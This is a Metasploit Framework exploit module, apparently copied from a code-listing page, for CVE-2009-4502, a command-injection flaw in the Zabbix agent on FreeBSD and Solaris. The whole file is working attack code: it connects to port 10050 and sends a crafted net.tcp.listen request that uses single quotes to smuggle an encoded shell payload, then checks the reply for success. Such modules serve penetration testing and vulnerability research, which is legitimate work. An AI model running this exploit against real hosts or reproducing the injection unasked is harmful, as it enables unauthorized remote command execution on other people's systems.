|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102  |  ## # $Id: zabbix_agent_exec.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::Tcp  def initialize(info = {})  super(update_info(info,  'Name' => 'Zabbix Agent net.tcp.listen Command Injection',  'Description'=> %q{  This module exploits a metacharacter injection vulnerability  in the FreeBSD and Solaris versions of the Zabbix agent. This flaw  can only be exploited if the attacker can hijack the IP address  of an authorized server (as defined in the configuration file).  },  'Author' => [ 'hdm' ],  'License'=> MSF_LICENSE,  'Version'=> '$Revision: 9669 $',  'References' =>  [  [ 'CVE', '2009-4502' ],  [ 'OSVDB', '60956' ],  [ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],  ],  'Platform' => ['unix'],  'Arch' => ARCH_CMD,  'Privileged' => false,  'Payload'=>  {  'BadChars'=> "'",  'Space' => 1024,  'DisableNops' => true,  'Compat'=>  {  'PayloadType' => 'cmd',  'RequiredCmd' => 'generic perl telnet',  }  },  'Targets'=>  [  [ 'Automatic Target', { }]  ],  'DefaultTarget'=> 0,  'DisclosureDate' => 'Sep 10 2009'))  register_options(  [  Opt::RPORT(10050)  ], self.class)  end  def exploit  connect  rnd_port = rand(1024) + 1  buf = "net.tcp.listen[#{rnd_port}';#{payload.encoded};']\n"  print_status("Sending net.tcp.listen() request to the zabbix agent...")  sock.put(buf)  res = nil  begin  res = sock.get_once(-1, 5)  rescue ::EOFError  end  if ! res  print_status("The zabbix agent did not reply, our IP must not be in the allowed server list.")  disconnect  return  end  if (res =~ /ZBX_NOTSUPPORTED/)  print_status("The zabbix agent is not running a vulnerable version or operating system.")  disconnect  return  end  if(res !~ /ZBXD/)  print_status("The zabbix agent returned an unknown response.")  disconnect  return  end  print_status("The zabbix agent should have executed our command.")  disconnect  end end  |